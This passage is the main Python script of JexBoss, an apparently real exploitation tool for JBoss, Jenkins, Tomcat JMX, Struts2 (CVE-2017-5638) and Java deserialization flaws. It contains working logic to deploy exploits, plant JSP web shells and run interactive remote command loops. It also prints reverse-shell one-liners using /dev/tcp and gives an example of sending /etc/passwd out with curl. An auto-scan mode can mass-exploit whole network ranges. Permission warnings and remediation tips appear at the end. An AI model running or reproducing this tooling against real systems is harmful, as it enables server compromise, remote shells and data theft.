555 | gadget=gl_args.gadget, show_payload=gl_args.show_payload)
556 | elif exploit_type == "JMX Tomcat":
557 |
558 | host, port = get_host_port_reverse_params()
559 | if host == port == gl_args.cmd == None: return False
560 | result = _exploits.exploit_jrmi(url, host=host, port=port, cmd=gl_args.cmd, is_win=gl_args.windows)
561 |
562 | elif exploit_type == "Application Deserialization":
563 |
564 | host, port = get_host_port_reverse_params()
565 |
566 | if host == port == gl_args.cmd == gl_args.load_gadget == None: return False
567 |
568 | result = _exploits.exploit_application_deserialization(url, host=host, port=port, cmd=gl_args.cmd, is_win=gl_args.windows,
569 | param=gl_args.post_parameter, force=gl_args.force,
570 | gadget_type=gl_args.gadget, show_payload=gl_args.show_payload,
571 | gadget_file=gl_args.load_gadget)
572 |
573 | elif exploit_type == "Servlet Deserialization":
574 |
575 | host, port = get_host_port_reverse_params()
576 |
577 | if host == port == gl_args.cmd == gl_args.load_gadget == None: return False
578 |
579 | result = _exploits.exploit_servlet_deserialization(url, host=host, port=port, cmd=gl_args.cmd, is_win=gl_args.windows,
580 | gadget=gl_args.gadget, gadget_file=gl_args.load_gadget)
581 |
582 | elif exploit_type == "Struts2":
583 |
584 | result = 200
585 |
586 | # if it seems to be exploited (201 is for jboss exploited with gadget)
587 | if result == 200 or result == 500 or result == 201:
588 |
589 | # if not auto_exploit, ask type enter to continue...
590 | if not gl_args.auto_exploit:
591 |
592 | if exploit_type in ("Application Deserialization", "Jenkins", "JMX Tomcat", "Servlet Deserialization") or result == 201:
593 | print_and_flush(BLUE + " * The exploit code was successfully sent. Check if you received the reverse shell\n"
594 | " connection on your server or if your command was executed. \n"+ ENDC+
595 | " Type [ENTER] to continue...\n")
596 | # wait while enter is typed
597 | input().lower() if version_info[0] >= 3 else raw_input().lower()
598 | return True
599 | else:
600 | if exploit_type == 'Struts2':
601 | shell_http_struts(url)
602 | else:
603 | print_and_flush(GREEN + " * Successfully deployed code! Starting command shell. Please wait...\n" + ENDC)
604 | shell_http(url, exploit_type)
605 |
606 | # if auto exploit mode, print message and continue...
607 | else:
608 | print_and_flush(GREEN + " * Successfully deployed/sended code via vector %s\n *** Run JexBoss in Standalone mode "
609 | "to open command shell. ***" %(exploit_type) + ENDC)
610 | return True
611 |
612 | # if not exploited, print error messagem and ask for type enter
613 | else:
614 | if exploit_type == 'admin-console':
615 | print_and_flush(GREEN + "\n * You can still try to exploit deserialization vulnerabilitie in ViewState!\n" +
616 | " Try this: python jexboss.py -u %s/admin-console/login.seam --app-unserialize\n" %url +
617 | " Type [ENTER] to continue...\n" + ENDC)
618 |
619 | else:
620 | print_and_flush(RED + "\n * Could not exploit the flaw automatically. Exploitation requires manual analysis...\n" +
621 | " Type [ENTER] to continue...\n" + ENDC)
622 | logging.error("Could not exploit the server %s automatically. HTTP Code: %s" %(url, result))
623 | # wait while enter is typed
624 | input().lower() if version_info[0] >= 3 else raw_input().lower()
625 | return False
626 |
627 |
628 | def ask_for_reverse_host_and_port():
629 | print_and_flush(GREEN + " * Please enter the IP address and tcp PORT of your listening server for try to get a REVERSE SHELL.\n"
630 | " OBS: You can also use the --cmd \"command\" to send specific commands to run on the server."+NORMAL)
631 |
632 | # If not *nix (that is, if somethine like git bash on Rwindow$)
633 | if not sys.stdout.isatty():
634 | print_and_flush(" IP Address (RHOST): ", same_line=True)
635 | host = input().lower() if version_info[0] >= 3 else raw_input().lower()
636 | print_and_flush(" Port (RPORT): ", same_line=True)
637 | port = input().lower() if version_info[0] >= 3 else raw_input().lower()
638 | else:
639 | host = input(" IP Address (RHOST): ").lower() if version_info[0] >= 3 else raw_input(" IP Address (RHOST): ").lower()
640 | port = input(" Port (RPORT): ").lower() if version_info[0] >= 3 else raw_input(" Port (RPORT): ").lower()
641 |
642 | print ("")
643 | return str(host), str(port)
644 |
645 |
646 | def get_host_port_reverse_params():
647 | # if reverse host were provided in the args, take it
648 | if gl_args.reverse_host:
649 |
650 | if gl_args.windows:
651 | jexboss.print_and_flush(RED + "\n * WINDOWS Systems still do not support reverse shell.\n"
652 | " Use option --cmd instead of --reverse-shell...\n" + ENDC +
653 | " Type [ENTER] to continue...\n")
654 | # wait while enter is typed
655 | input().lower() if version_info[0] >= 3 else raw_input().lower()
656 | return None, None
657 |
658 | tokens = gl_args.reverse_host.split(":")
659 | if len(tokens) != 2:
660 | host, port = ask_for_reverse_host_and_port()
661 | else:
662 | host = tokens[0]
663 | port = tokens[1]
664 | # if neither cmd nor reverse nor load_gadget was provided, ask host and port
665 | elif gl_args.cmd is None and gl_args.load_gadget is None:
666 | host, port = ask_for_reverse_host_and_port()
667 | else:
668 | # if cmd or gadget file ware privided
669 | host, port = None, None
670 |
671 | return host, port
672 |
673 |
674 | def shell_http_struts(url):
675 | """
676 | Connect to an HTTP shell
677 | :param url: struts app url
678 | :param shell_type: The type of shell to connect to
679 | """
680 | print_and_flush("# ----------------------------------------- #\n")
681 | print_and_flush(GREEN + BOLD + " * For a Reverse Shell (like meterpreter =]), type sometime like: \n\n"
682 | "\n" +ENDC+
683 | " Shell>/bin/bash -i > /dev/tcp/192.168.0.10/4444 0>&1 2>&1\n"
684 | " \n"+GREEN+
685 | " And so on... =]\n" +ENDC
686 | )
687 | print_and_flush("# ----------------------------------------- #\n")
688 |
689 | resp = _exploits.exploit_struts2_jakarta_multipart(url,'whoami', gl_args.cookies)
690 |
691 | print_and_flush(resp.replace('\\n', '\n'), same_line=True)
692 | logging.info("Server %s exploited!" %url)
693 |
694 | while 1:
695 | print_and_flush(BLUE + "[Type commands or \"exit\" to finish]" +ENDC)
696 |
697 | if not sys.stdout.isatty():
698 | print_and_flush("Shell> ", same_line=True)
699 | cmd = input() if version_info[0] >= 3 else raw_input()
700 | else:
701 | cmd = input("Shell> ") if version_info[0] >= 3 else raw_input("Shell> ")
702 |
703 | if cmd == "exit":
704 | break
705 |
706 | resp = _exploits.exploit_struts2_jakarta_multipart(url, cmd, gl_args.cookies)
707 | print_and_flush(resp.replace('\\n', '\n'))
708 |
709 |
710 | # FIX: capture the readtimeout File "jexboss.py", line 333, in shell_http
711 | def shell_http(url, shell_type):
712 | """
713 | Connect to an HTTP shell
714 | :param url: The URL to connect to
715 | :param shell_type: The type of shell to connect to
716 | """
717 | headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
718 | "Connection": "keep-alive",
719 | "User-Agent": get_random_user_agent()}
720 |
721 | if gl_args.disable_check_updates:
722 | headers['no-check-updates'] = 'true'
723 |
724 | if shell_type == "jmx-console" or shell_type == "web-console" or shell_type == "admin-console":
725 | path = '/jexws4/jexws4.jsp?'
726 | elif shell_type == "JMXInvokerServlet":
727 | path = '/jexinv4/jexinv4.jsp?'
728 |
729 | gl_http_pool.request('GET', url+path, redirect=False, headers=headers)
730 |
731 | sleep(7)
732 | resp = ""
733 | print_and_flush("# ----------------------------------------- # LOL # ----------------------------------------- #\n")
734 | print_and_flush(RED + " * " + url + ": \n" + ENDC)
735 | print_and_flush("# ----------------------------------------- #\n")
736 | print_and_flush(GREEN + BOLD + " * For a Reverse Shell (like meterpreter =]), type the command: \n\n"
737 | " jexremote=YOUR_IP:YOUR_PORT\n\n" + ENDC + GREEN +
738 | " Example:\n" +ENDC+
739 | " Shell>jexremote=192.168.0.10:4444\n"
740 | "\n" +GREEN+
741 | " Or use other techniques of your choice, like:\n" +ENDC+
742 | " Shell>/bin/bash -i > /dev/tcp/192.168.0.10/4444 0>&1 2>&1\n"
743 | " \n"+GREEN+
744 | " And so on... =]\n" +ENDC
745 | )
746 | print_and_flush("# ----------------------------------------- #\n")
747 |
748 | for cmd in ['uname -a', 'cat /etc/issue', 'id']:
749 | cmd = urlencode({"ppp": cmd})
750 | try:
751 | r = gl_http_pool.request('GET', url + path + cmd, redirect=False, headers=headers)
752 | resp += " " + str(r.data).split(">")[1]
753 | except:
754 | print_and_flush(RED + " * Apparently an IPS is blocking some requests. Check for updates will be disabled...\n\n"+ENDC)
755 | logging.warning("Disabling checking for updates.", exc_info=traceback)
756 | headers['no-check-updates'] = 'true'
757 |
758 | print_and_flush(resp.replace('\\n', '\n'), same_line=True)
759 | logging.info("Server %s exploited!" %url)
760 |
761 | while 1:
762 | print_and_flush(BLUE + "[Type commands or \"exit\" to finish]" +ENDC)
763 |
764 | if not sys.stdout.isatty():
765 | print_and_flush("Shell> ", same_line=True)
766 | cmd = input() if version_info[0] >= 3 else raw_input()
767 | else:
768 | cmd = input("Shell> ") if version_info[0] >= 3 else raw_input("Shell> ")
769 |
770 | if cmd == "exit":
771 | break
772 |
773 | cmd = urlencode({"ppp": cmd})
774 | try:
775 | r = gl_http_pool.request('GET', url + path + cmd, redirect=False, headers=headers)
776 | except:
777 | print_and_flush(RED + " * Error contacting the command shell. Try again and see logs for details ...")
778 | logging.error("Error contacting the command shell", exc_info=traceback)
779 | continue
780 |
781 | resp = str(r.data)
782 | if r.status == 404:
783 | print_and_flush(RED + " * Error contacting the command shell. Try again later...")
784 | continue
785 | stdout = ""
786 | try:
787 | stdout = resp.split("pre>")[1]
788 | except:
789 | print_and_flush(RED + " * Error contacting the command shell. Try again later...")
790 | if stdout.count("An exception occurred processing JSP page") == 1:
791 | print_and_flush(RED + " * Error executing command \"%s\". " % cmd.split("=")[1] + ENDC)
792 | else:
793 | print_and_flush(stdout.replace('\\n', '\n'))
794 |
795 |
796 | def clear():
797 | """
798 | Clears the console
799 | """
800 | if name == 'posix':
801 | system('clear')
802 | elif name == ('ce', 'nt', 'dos'):
803 | system('cls')
804 |
805 |
806 | def banner():
807 | """
808 | Print the banner
809 | """
810 | clear()
811 | print_and_flush(RED1 + "\n * --- JexBoss: Jboss verify and EXploitation Tool --- *\n"
812 | " | * And others Java Deserialization Vulnerabilities * | \n"
813 | " | |\n"
814 | " | @author: João Filho Matos Figueiredo |\n"
815 | " | @contact: joaomatosf@gmail.com |\n"
816 | " | |\n"
817 | " | @update: https://github.com/joaomatosf/jexboss |\n"
818 | " #______________________________________________________#\n")
819 | print_and_flush(RED1 + " @version: %s" % __version__)
820 | print_and_flush (ENDC)
821 |
822 |
823 | def help_usage():
824 | usage = (BOLD + BLUE + " Examples: [for more options, type python jexboss.py -h]\n" + ENDC +
825 | BLUE + "\n For simple usage, you must provide the host name or IP address you\n"
826 | " want to test [-host or -u]:\n" +
827 | GREEN + "\n $ python jexboss.py -u https://site.com.br" +
828 |
829 | BLUE + "\n\n For Java Deserialization Vulnerabilities in HTTP POST parameters. \n"
830 | " This will ask for an IP address and port to try to get a reverse shell:\n" +
831 | GREEN + "\n $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize" +
832 |
833 | BLUE + "\n\n For Java Deserialization Vulnerabilities in a custom HTTP parameter and \n"
834 | " to send a custom command to be executed on the exploited server:\n" +
835 | GREEN + "\n $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize\n"
836 | " -H parameter_name --cmd 'curl -d@/etc/passwd http://your_server'" +
837 |
838 | BLUE + "\n\n For Java Deserialization Vulnerabilities in a Servlet (like Invoker):\n"+
839 | GREEN + "\n $ python jexboss.py -u http://vulnerable_java_app/path --servlet-unserialize\n" +
840 |
841 | BLUE + "\n\n To test Java Deserialization Vulnerabilities with DNS Lookup:\n" +
842 | GREEN + "\n $ python jexboss.py -u http://vulnerable_java_app/path --gadget dns --dns test.yourdomain.com" +
843 |
844 | BLUE + "\n\n For Jenkins CLI Deserialization Vulnerabilitie:\n"+
845 | GREEN + "\n $ python jexboss.py -u http://vulnerable_java_app/jenkins --jenkins"+
846 |
847 | BLUE + "\n\n For Apache Struts2 Vulnerabilities (CVE-2017-5638):\n" +
848 | GREEN + "\n $ python jexboss.py -u http://vulnerable_java_app/path.action --struts2\n" +
849 |
850 | BLUE + "\n\n For auto scan mode, you must provide the network in CIDR format, "
851 | "\n list of ports and filename for store results:\n" +
852 | GREEN + "\n $ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 \n"
853 | " -results report_auto_scan.log" +
854 |
855 | BLUE + "\n\n For file scan mode, you must provide the filename with host list "
856 | "\n to be scanned (one host per line) and filename for store results:\n" +
857 | GREEN + "\n $ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log\n" + ENDC)
858 | return usage
859 |
860 |
861 | def network_args(string):
862 | try:
863 | if version_info[0] >= 3:
864 | value = ipaddress.ip_network(string)
865 | else:
866 | value = ipaddress.ip_network(unicode(string))
867 | except:
868 | msg = "%s is not a network address in CIDR format." % string
869 | logging.error("%s is not a network address in CIDR format." % string)
870 | raise argparse.ArgumentTypeError(msg)
871 | return value
872 |
873 |
874 | def main():
875 | """
876 | Run interactively. Call when the module is run by itself.
877 | :return: Exit code
878 | """
879 | # check for Updates
880 | if not gl_args.disable_check_updates:
881 | updates = _updates.check_updates()
882 | if updates:
883 | print_and_flush(BLUE + BOLD + "\n\n * An update is available and is recommended update before continuing.\n" +
884 | " Do you want to update now?")
885 | if not sys.stdout.isatty():
886 | print_and_flush(" YES/no? ", same_line=True)
887 | pick = input().lower() if version_info[0] >= 3 else raw_input().lower()
888 | else:
889 | pick = input(" YES/no? ").lower() if version_info[0] >= 3 else raw_input(" YES/no? ").lower()
890 |
891 | print_and_flush(ENDC)
892 | if pick != "no":
893 | updated = _updates.auto_update()
894 | if updated:
895 | print_and_flush(GREEN + BOLD + "\n * The JexBoss has been successfully updated. Please run again to enjoy the updates.\n" +ENDC)
896 | exit(0)
897 | else:
898 | print_and_flush(RED + BOLD + "\n\n * An error occurred while updating the JexBoss. Please try again..\n" +ENDC)
899 | exit(1)
900 |
901 | vulnerables = False
902 | # check vulnerabilities for standalone mode
903 | if gl_args.mode == 'standalone':
904 | url = gl_args.host
905 | scan_results = check_vul(url)
906 | # performs exploitation for jboss vulnerabilities
907 | for vector in scan_results:
908 | if scan_results[vector] == 200 or scan_results[vector] == 500:
909 | vulnerables = True
910 | if gl_args.auto_exploit:
911 | auto_exploit(url, vector)
912 | else:
913 |
914 | if vector == "Application Deserialization":
915 | msg_confirm = " If successful, this operation will provide a reverse shell. You must enter the\n" \
916 | " IP address and Port of your listening server.\n"
917 | else:
918 | msg_confirm = " If successful, this operation will provide a simple command shell to execute \n" \
919 | " commands on the server..\n"
920 |
921 | print_and_flush(BLUE + "\n\n * Do you want to try to run an automated exploitation via \"" +
922 | BOLD + vector + NORMAL + "\" ?\n" +
923 | msg_confirm +
924 | RED + " Continue only if you have permission!" + ENDC)
925 | if not sys.stdout.isatty():
926 | print_and_flush(" yes/NO? ", same_line=True)
927 | pick = input().lower() if version_info[0] >= 3 else raw_input().lower()
928 | else:
929 | pick = input(" yes/NO? ").lower() if version_info[0] >= 3 else raw_input(" yes/NO? ").lower()
930 |
931 | if pick == "yes":
932 | auto_exploit(url, vector)
933 |
934 | # check vulnerabilities for auto scan mode
935 | elif gl_args.mode == 'auto-scan':
936 | file_results = open(gl_args.results, 'w')
937 | file_results.write("JexBoss Scan Mode Report\n\n")
938 | for ip in gl_args.network.hosts():
939 | if gl_interrupted: break
940 | for port in gl_args.ports.split(","):
941 | if check_connectivity(ip, port):
942 | url = "{0}:{1}".format(ip,port)
943 | ip_results = check_vul(url)
944 | for key in ip_results.keys():
945 | if ip_results[key] == 200 or ip_results[key] == 500:
946 | vulnerables = True
947 | if gl_args.auto_exploit:
948 | result_exploit = auto_exploit(url, key)
949 | if result_exploit:
950 | file_results.write("{0}:\t[EXPLOITED VIA {1}]\n".format(url, key))
951 | else:
952 | file_results.write("{0}:\t[FAILED TO EXPLOITED VIA {1}]\n".format(url, key))
953 | else:
954 | file_results.write("{0}:\t[POSSIBLY VULNERABLE TO {1}]\n".format(url, key))
955 |
956 | file_results.flush()
957 | else:
958 | print_and_flush (RED+"\n * Host %s:%s does not respond."% (ip,port)+ENDC)
959 | file_results.close()
960 | # check vulnerabilities for file scan mode
961 | elif gl_args.mode == 'file-scan':
962 | file_results = open(gl_args.out, 'w')
963 | file_results.write("JexBoss Scan Mode Report\n\n")
964 | file_input = open(gl_args.file, 'r')
965 | for url in file_input.readlines():
966 | if gl_interrupted: break
967 | url = url.strip()
968 | ip = str(parse_url(url)[2])
969 | port = parse_url(url)[3] if parse_url(url)[3] != None else 80
970 | if check_connectivity(ip, port):
971 | url_results = check_vul(url)
972 | for key in url_results.keys():
973 | if url_results[key] == 200 or url_results[key] == 500:
974 | vulnerables = True
975 | if gl_args.auto_exploit:
976 | result_exploit = auto_exploit(url, key)
977 | if result_exploit:
978 | file_results.write("{0}:\t[EXPLOITED VIA {1}]\n".format(url, key))
979 | else:
980 | file_results.write("{0}:\t[FAILED TO EXPLOITED VIA {1}]\n".format(url, key))
981 | else:
982 | file_results.write("{0}:\t[POSSIBLY VULNERABLE TO {1}]\n".format(url, key))
983 |
984 | file_results.flush()
985 | else:
986 | print_and_flush (RED + "\n * Host %s:%s does not respond." % (ip, port) + ENDC)
987 | file_results.close()
988 |
989 | # resume results
990 | if vulnerables:
991 | banner()
992 | print_and_flush(RED + BOLD+" Results: potentially compromised server!" + ENDC)
993 | if gl_args.mode == 'file-scan':
994 | print_and_flush(RED + BOLD + " ** Check more information on file {0} **".format(gl_args.out) + ENDC)
995 | elif gl_args.mode == 'auto-scan':
996 | print_and_flush(RED + BOLD + " ** Check more information on file {0} **".format(gl_args.results) + ENDC)
997 |
998 | print_and_flush(GREEN + " ---------------------------------------------------------------------------------\n"
999 | +BOLD+ " Recommendations: \n" +ENDC+
1000 | GREEN+ " - Remove web consoles and services that are not used, eg:\n"
1001 | " $ rm web-console.war http-invoker.sar jmx-console.war jmx-invoker-adaptor-server.sar admin-console.war\n"
1002 | " - Use a reverse proxy (eg. nginx, apache, F5)\n"
1003 | " - Limit access to the server only via reverse proxy (eg. DROP INPUT POLICY)\n"
1004 | " - Search vestiges of exploitation within the directories \"deploy\" and \"management\".\n"
1005 | " - Do NOT TRUST serialized objects received from the user\n"
1006 | " - If possible, stop using serialized objects as input!\n"
1007 | " - If you need to work with serialization, consider migrating to the Gson lib.\n"
1008 | " - Use a strict whitelist with Look-ahead[3] before deserialization\n"
1009 | " - For a quick (but not definitive) remediation for the viewState input, store the state \n"
1010 | " of the view components on the server (this will increase the heap memory consumption): \n"
1011 | " In web.xml, change the \"client\" parameter to \"server\" on STATE_SAVING_METHOD.\n"
1012 | " - Upgrade Apache Struts: https://cwiki.apache.org/confluence/display/WW/S2-045\n"
1013 | "\n References:\n"
1014 | " [1] - https://developer.jboss.org/wiki/SecureTheJmxConsole\n"
1015 | " [2] - https://issues.jboss.org/secure/attachment/12313982/jboss-securejmx.pdf\n"
1016 | " [3] - https://www.ibm.com/developerworks/library/se-lookahead/\n"
1017 | " [4] - https://www.owasp.org/index.php/Deserialization_of_untrusted_data\n"
1018 | "\n"
1019 | " - If possible, discard this server!\n"
1020 | " ---------------------------------------------------------------------------------")
1021 | else:
1022 | print_and_flush(GREEN + "\n\n * Results: \n" +
1023 | " The server is not vulnerable to bugs tested ... :D\n" + ENDC)
1024 | # infos
1025 | print_and_flush(ENDC + " * Info: review, suggestions, updates, etc: \n" +
1026 | " https://github.com/joaomatosf/jexboss\n")
1027 |
1028 | print_and_flush(GREEN + BOLD + " * DONATE: " + ENDC + "Please consider making a donation to help improve this tool,\n" +
1029 | GREEN + BOLD + " * Bitcoin Address: " + ENDC + " 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C \n" )
1030 |
1031 |
1032 | print_and_flush(ENDC)
1033 |
1034 | #banner()
1035 |
1036 |
1037 | if __name__ == "__main__":
1038 |
1039 |
1040 | parser = argparse.ArgumentParser(
1041 | formatter_class=argparse.RawDescriptionHelpFormatter,
1042 | #description="JexBoss v%s: JBoss verify and EXploitation Tool" %__version,
1043 | description=textwrap.dedent(RED1 +
1044 | "\n # --- JexBoss: Jboss verify and EXploitation Tool --- #\n"
1045 | " | And others Java Deserialization Vulnerabilities | \n"
1046 | " | |\n"
1047 | " | @author: João Filho Matos Figueiredo |\n"
1048 | " | @contact: joaomatosf@gmail.com |\n"
1049 | " | |\n"
1050 | " | @updates: https://github.com/joaomatosf/jexboss |\n"
1051 | " #______________________________________________________#\n"
1052 | " @version: " + __version__ + "\n" + help_usage()),
1053 | epilog="",
1054 | prog="JexBoss"
1055 | )
1056 |
1057 | group_standalone = parser.add_argument_group('Standalone mode')
1058 | group_advanced = parser.add_argument_group('Advanced Options (USE WHEN EXPLOITING JAVA UNSERIALIZE IN APP LAYER)')
1059 | group_auto_scan = parser.add_argument_group('Auto scan mode')
1060 | group_file_scan = parser.add_argument_group('File scan mode')
1061 |
1062 | # optional parameters ---------------------------------------------------------------------------------------
1063 | parser.add_argument('--version', action='version', version='%(prog)s ' + __version__)
1064 | parser.add_argument("--auto-exploit", "-A", help="Send exploit code automatically (USE ONLY IF YOU HAVE PERMISSION!!!)",
1065 | action='store_true')
1066 | parser.add_argument("--disable-check-updates", "-D", help="Disable two updates checks: 1) Check for updates "
1067 | "performed by the webshell in exploited server at http://webshell.jexboss.net/jsp_version.txt and 2) check for updates "
1068 | "performed by the jexboss client at http://joaomatosf.com/rnp/releases.txt",
1069 | action='store_true')
1070 | parser.add_argument('-mode', help="Operation mode (DEFAULT: standalone)", choices=['standalone', 'auto-scan', 'file-scan'], default='standalone')
1071 | parser.add_argument("--app-unserialize", "-j",
1072 | help="Check for java unserialization vulnerabilities in HTTP parameters (eg. javax.faces.ViewState, "
1073 | "oldFormData, etc)", action='store_true')
1074 | parser.add_argument("--servlet-unserialize", "-l",
1075 | help="Check for java unserialization vulnerabilities in Servlets (like Invoker interfaces)",
1076 | action='store_true')
1077 | parser.add_argument("--jboss", help="Check only for JBOSS vectors.", action='store_true')
1078 | parser.add_argument("--jenkins", help="Check only for Jenkins CLI vector (CVE-2015-5317).", action='store_true')
1079 | parser.add_argument("--struts2", help="Check only for Struts2 Jakarta Multipart parser (CVE-2017-5638).", action='store_true')
1080 | parser.add_argument("--jmxtomcat", help="Check JMX JmxRemoteLifecycleListener in Tomcat (CVE-2016-8735 and "
1081 | "CVE-2016-3427). OBS: Will not be checked by default.", action='store_true')
1082 |
1083 | parser.add_argument('--proxy', "-P", help="Use a http proxy to connect to the target URL (eg. -P http://192.168.0.1:3128)", )
1084 | parser.add_argument('--proxy-cred', "-L", help="Proxy authentication credentials (eg -L name:password)", metavar='LOGIN:PASS')
1085 | parser.add_argument('--jboss-login', "-J", help="JBoss login and password for exploit admin-console in JBoss 5 and JBoss 6 "
1086 | "(default: admin:admin)", metavar='LOGIN:PASS', default='admin:admin')
1087 | parser.add_argument('--timeout', help="Seconds to wait before timeout connection (default 3)", default=3, type=int)
1088 |
1089 | parser.add_argument('--cookies', help="Specify cookies for Struts 2 Exploit. Use this to test features that require authentication. "
1090 | "Format: \"NAME1=VALUE1; NAME2=VALUE2\" (eg. --cookie \"JSESSIONID=24517D9075136F202DCE20E9C89D424D\""
1091 | , type=str, metavar='NAME=VALUE')
1092 | #parser.add_argument('--retries', help="Retries when the connection timeouts (default 3)", default=3, type=int)
1093 |
1094 | # advanced parameters ---------------------------------------------------------------------------------------
1095 | group_advanced.add_argument("--reverse-host", "-r", help="Remote host address and port for reverse shell when exploiting "
1096 | "Java Deserialization Vulnerabilities in application layer "
1097 | "(for now, working only against *nix systems)"
1098 | "(eg. 192.168.0.10:1331)", type=str, metavar='RHOST:RPORT')
1099 | group_advanced.add_argument("--cmd", "-x",
1100 | help="Send specific command to run on target (eg. curl -d @/etc/passwd http://your_server)"
1101 | , type=str, metavar='CMD')
1102 | group_advanced.add_argument("--dns", help="Specifies the dns query for use with \"dns\" Gadget", type=str, metavar='URL')
1103 | group_advanced.add_argument("--windows", "-w", help="Specifies that the commands are for rWINDOWS System$ (cmd.exe)",
1104 | action='store_true')
1105 | group_advanced.add_argument("--post-parameter", "-H", help="Specify the parameter to find and inject serialized objects into it."
1106 | " (egs. -H javax.faces.ViewState or -H oldFormData (<- Hi PayPal =X) or others)"
1107 | " (DEFAULT: javax.faces.ViewState)",
1108 | default='javax.faces.ViewState', metavar='PARAMETER')
1109 | group_advanced.add_argument("--show-payload", "-t", help="Print the generated payload.",
1110 | action='store_true')
1111 | group_advanced.add_argument("--gadget", help="Specify the type of Gadget to generate the payload automatically."
1112 | " (DEFAULT: commons-collections3.1 or groovy1 for JenKins)",
1113 | choices=['commons-collections3.1', 'commons-collections4.0', 'jdk7u21', 'jdk8u20', 'groovy1', 'dns'],
1114 | default='commons-collections3.1')
1115 | group_advanced.add_argument("--load-gadget", help="Provide your own gadget from file (a java serialized object in RAW mode)",
1116 | metavar='FILENAME')
1117 | group_advanced.add_argument("--force", "-F",
1118 | help="Force send java serialized gadgets to URL informed in -u parameter. This will "
1119 | "send the payload in multiple formats (eg. RAW, GZIPED and BASE64) and with "
1120 | "different Content-Types.",action='store_true')
1121 |
1122 | # required parameters ---------------------------------------------------------------------------------------
1123 | group_standalone.add_argument("-host", "-u", help="Host address to be checked (eg. -u http://192.168.0.10:8080)",
1124 | type=str)
1125 |
1126 | # scan's mode parameters ---------------------------------------------------------------------------------------
1127 | group_auto_scan.add_argument("-network", help="Network to be checked in CIDR format (eg. 10.0.0.0/8)",
1128 | type=network_args, default='192.168.0.0/24')
1129 | group_auto_scan.add_argument("-ports", help="List of ports separated by commas to be checked for each host "
1130 | "(eg. 8080,8443,8888,80,443)", type=str, default='8080,80')
1131 | group_auto_scan.add_argument("-results", help="File name to store the auto scan results", type=str,
1132 | metavar='FILENAME', default='jexboss_auto_scan_results.log')
1133 |
1134 | group_file_scan.add_argument("-file", help="Filename with host list to be scanned (one host per line)",
1135 | type=str, metavar='FILENAME_HOSTS')
1136 | group_file_scan.add_argument("-out", help="File name to store the file scan results", type=str,
1137 | metavar='FILENAME_RESULTS', default='jexboss_file_scan_results.log')
1138 |
1139 | gl_args = parser.parse_args()
1140 |
1141 | if (gl_args.mode == 'standalone' and gl_args.host is None) or \
1142 | (gl_args.mode == 'file-scan' and gl_args.file is None) or \
1143 | (gl_args.gadget == 'dns' and gl_args.dns is None):
1144 | banner()
1145 | print (help_usage())
1146 | exit(0)
1147 | else:
1148 | configure_http_pool()
1149 | _updates.set_http_pool(gl_http_pool)
1150 | _exploits.set_http_pool(gl_http_pool)
1151 | banner()
1152 | if gl_args.proxy and not is_proxy_ok():
1153 | exit(1)
1154 | if gl_args.gadget == 'dns': gl_args.cmd = gl_args.dns
1155 | main()
1156 |
1157 | if __name__ == '__testing__':
1158 | headers = {"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
1159 | "Connection": "keep-alive",
1160 | "User-Agent": get_random_user_agent()}
1161 |
1162 | timeout = Timeout(connect=1.0, read=3.0)
1163 | gl_http_pool = PoolManager(timeout=timeout, cert_reqs='CERT_NONE')
1164 | _exploits.set_http_pool(gl_http_pool)
1165 |
1166 |
1167 |
--------------------------------------------------------------------------------